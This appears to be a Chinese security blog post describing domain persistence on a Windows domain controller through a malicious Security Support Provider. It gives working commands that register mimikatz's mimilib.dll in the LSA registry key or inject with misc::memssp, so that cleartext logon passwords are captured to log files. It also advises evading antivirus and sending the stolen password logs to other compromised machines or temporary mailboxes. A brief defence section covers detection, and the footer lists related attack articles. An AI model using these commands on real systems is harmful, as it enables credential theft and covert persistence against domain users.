域渗透|域权限维持之SSP

最新推荐文章于 2025-03-01 20:25:49 发布
最新推荐文章于 2025-03-01 20:25:49 发布
阅读量1.3k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 域渗透 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42282189/article/details/120103661

域渗透|域权限维持之SSP

作者:r0n1n
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x00 测试环境


域控服务器:Win-2008DC—10.10.10.30
域:god.com

0x01 前言

SSP即Security Support Provider(安全支持提供者)是一个用于实现身份验证的DLL文件,主要用于Windows操作系统的身份认证功能。
当操作系统启动时SSP会被加载到lsass.exe进程中,由于lsass可通过注册表进行扩展,导致了在操作系统启动时,可以加载一个自定义的dll,来实现想要执行的操作。
当我们在域环境内对LSA进行拓展自定义DLL文件时,就能够获取到lsass.exe进程中的明文密码,即使修改密码重新登陆,我们依旧可以获得密码,达到域权限维持的效果。

0x02 利用

方法一、修改注册表扩展功能

1、首先将mimikatz中的 mimilib.dll 传到目标域控的c:\windows\system32\目录下,使用dll的位数与目标操作系统保持一致。
在这里插入图片描述
2、修改注册表,在键值Security Packages下添加 mimilib.dll,系统重启后会记录登陆密码。

reg query HKLM\System\CurrentControlSet\Control\Lsa /v "Security Package"

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

在这里插入图片描述
修改成功后的注册表如下图所示:
在这里插入图片描述
3、重启目标系统,重启后有用户登陆到当前系统,会在c:\windows\system32\目录下生成一个记录登陆账号密码的kiwissp.log文件。
在这里插入图片描述
在这里插入图片描述

方法二、进程注入lsass.exe

1、使用mimikatz对lsass.exe进程注入,会在C:\Windows\System32\生成一个mimilsa.log日志文件,里面包含当前登陆的明文密码。

privilege::debug
misc::memssp

在这里插入图片描述
在这里插入图片描述

0x03 总结

攻防实战中,靶机很难会重启,攻击者重启的话风险过大,因此可以在靶机上把两个方法相互结合起来使用效果比较好,前提需要做好免杀,并且可以尝试利用把生成的日志密码文件发送到其他内网被控机器或者临时邮箱。

0x04 防御

对于两种方法的详细分析,在防御策略上也要根据攻击步骤进行防御:首先检查注册表中HKLM\System\CurrentControlSet\Control\Lsa\Security Packages项中是否含有可疑的DLL文件、再检查C:\Windows\System32\目录下是否存在可疑的DLL文件,最后可以使用第三方的工具来查看LSA中是否存在可疑DLL文件。

0x05 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
在这里插入图片描述

域控权限持久化之注入SSP
谢公子的博客
02-27 1983
SSP SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是一个DLL文件,主要用来实现Windows操作系统的身份认证功能,例如:NTLM、Kerberos、Negotiate、Secure Channel(Schannel),Digest、Credential(CredSSP) SSPI(Security Supp...
内网渗透-域内的权限维持
lza20001103的博客
10-01 1208
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持,权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
域内权限维持:注入SSP
01-29 745
01、简介 SSP(Security Support Provider)是Windows操作系统安全机制的提供者。简单地说,SSP是个DLL文件,主要用来实现Windows操作系统的身份认证功能。在系统启动时,SSP 将被加载到lsass.exe进程中,攻击者通过自定义恶意的DLL文件,在系统启动时将其加载到lsass.exe进程中,就能够获取lsass.exe进程中的明文密码。这样,即使用户更...
【权限维持】域控后门&SSP&HOOK&DSRM&SID&万能钥匙
今天是几号的博客
04-09 1645
攻防实战中,靶机很难会重启,攻击者重启的话风险过大,因此可以在靶机上把两个方法相互结合起来使用效果比较好,尝试利用把生成的日志密码文件发送到内网被控机器或者临时邮箱。DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。
超详细的域渗透过程!
热门推荐
xiaoi123的博客
05-02 1万+
大家好!我们在这个write up 里讲下几个不同的入侵 windows domian 时的横向操作。 内容不会过于深入,而会介绍一些基本技巧和流程. 为了保证测试客观性所以我将使用我们的测试对象 lock domain “REDHOOK”. 希望这会成为我们第一个关于 windows domian 的系列教程. 如果你要具体了解某些细节(比如kerberos 的 tickets)欢迎发email...
141-权限维持&域控后门&SSP&HOOK&DSRM&SID&万能钥匙
dreamer292的博客
08-24 1037
权限维持相关知识点
域权限维持方法浅析.pdf
08-08
前情提要& 本集简介 ...Malicious Security Support Provider (SSP) Hook PasswordChangeNotify Skeleton Key DCShadow BadGPO(Group Policy Objects) ACL (Access Control Lists) ACL -AdminSDHolder ACL -DCSync
域权限维持方法技术解析.pptx
10-19
在IT领域,特别是网络安全和系统管理中,"域权限维持方法技术解析"是一个重要的主题,涉及到如何保护和管理企业网络中的Active Directory环境。Active Directory(AD)是Microsoft Windows网络操作系统的核心组件,...
一次域环境下的渗透
Mccc_li的博客
11-12 1437
域渗透
内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持
weixin_45701675的博客
04-25 944
内网安全之权限维持
通过注入 SSP 捕获用户登录明文密码
渗透之路,攻防之间皆学问
10-09 219
由于lsass.exe进程负责处理与安全相关的操作,如身份认证和密码存储,若我们定义一个恶意的DLL文件,在目标系统启动时自动加载到 lsass.exe进程中,那么攻击者就能够获取lsass.exe进程中的明文密码,即使用户更改密码并重新登录,攻击者依然可以获取该账号的新密码。SSP(Security Support Provider)是Windows操作系统安全机制的提供者,SSP通常以DLL(动态链接库)文件的形式存在,这些文件包含了实现安全功能的代码。能抓取本地用户或域用户密码。
恶意 SSP 注入收集密码
最新发布
anddddoooo的博客
03-01 296
SSP 安全服务提供者,是微软提供的与安全有关的函数接口,用户可根据自己的需求调用 SSP 接口实现高度自定义的身份验证等安全功能。攻击者注入恶意的 SSP 接口覆盖微软默认的某些安全功能,导致用户一旦进行身份验证,恶意的 SSP 将保存用户输入明文密码。当用户登录时,恶意 ssp 触发,将明文密码写入 C:\Windows\System32\mimilsa.txt。
内网渗透(七十四)之后渗透密码收集之注入SSP
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-15 602
由于我们可以编写自己的SSP,然后注册到操作系统中,让操作系统支持我们自定义的身份验证方法,因此如果攻击者获得了机器的最高权限,就可以编写一个恶意的SSP,然后将其注册到操作系统中。当用户登陆时,恶意的SSP就可以捕捉到用户输入的明文密码,也不会影响用户的正常登录。由于注入SSP需要服务器的最高权限,因此通常需要获得域管理员权限才能在域控上执行SSP注入。因此,该方法常被用作后渗透密码收集。
域内权限维持思路总结
道一安全
08-16 1872
在通过某个漏洞或者通过域用户机器抓取hash等手段拿到域控制器权限后,如果不做权限维持,很有可能因为域管理员将域控的密码修改了或者讲漏洞修复了,导致域控制器权限丢失,导致之前的努力都白费了。
内网安全——权限维持SSP&HOOK&SID& DSRM&Skeleton
m0_61506558的博客
03-01 1056
SSP即Security Support Provider(安全支持提供者)是一个用于实现身份验证的DLL文件,主要用于Windows操作系统的身份认证功能。当操作系统启动时SSP会被加载到lsass.exe进程中,由于lsass可通过注册表进行扩展,导致了在操作系统启动时,可以加载一个自定义的dll,来实现想要执行的操作。当我们在域环境内对LSA进行拓展自定义DLL文件时,就能够获取到lsass.exe进程中的明文密码,即使修改密码重新登陆,我们依旧可以获得密码,达到域权限维持的效果。
1、权限维持&域控后门&SSP
m0_65842464的博客
02-25 958
很多时候拿下了一台服务器权限后,可能过几天就会无法控制,因为企业都会有专业人士定期查杀后门、杀毒检测、漏洞修复等,所以可能很快就会失去控制权限,而权限维持的目的是保证自己的权限不会掉,一直能够控制目标服务器。两种方法都是盗取身份认证文件,便于长久访问的权限维持,第一种方法重启后失效,第二种方法重启后才生效,各有各的好处,所以可以配合使用。
对抗无落地的shellcode注入
hongduilanjun的博客
07-21 2266
一般的shellcode加载到内存都是通过和来获取函数进行shellcode加载,亦或是通过远程申请一块空间来放入shellcode的地址进行加载。为了隐蔽,攻击者通常会通过PEB找到链表,自己去定位函数从而规避杀软对导入表的监控。攻击者先把shellcode加密,在写入时解密存放到内存空间,使用基于文件检测的方法,是无能为力的,那么这种无落地的方式,最终都会在内存中一览无余。...
绕过卡巴斯基通过RPC控制lsass注入DLL
2ed
04-16 3256
参考国外的XPN以及3gstudent大佬的文章: https://blog.youkuaiyun.com/xiangshen1990/article/details/104872566 https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0 原理:正常的ssp扩展(dll)可以加载到lsass进程中去,比如kerberos验证都是通...
内网渗透-hash传递
weixin_44912035的博客
02-09 497
passingthehash 获取hash值 run post/windows/gather/smart_hashdump 检查权限和系统类型 检查是否是域控服务器 从注册表读取hash,注入lsass进程 如果是08server并具有管理员权限直接getsystem 如果是windows且uac关闭具有管理员权限,直接读取 03/xp直接getsystem 从注册表获取hash 获取到meterpreter,先进程迁移再提权,然后hashdump hash传递 exploit/windows/smb/p
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

灼剑(Tsojan)安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值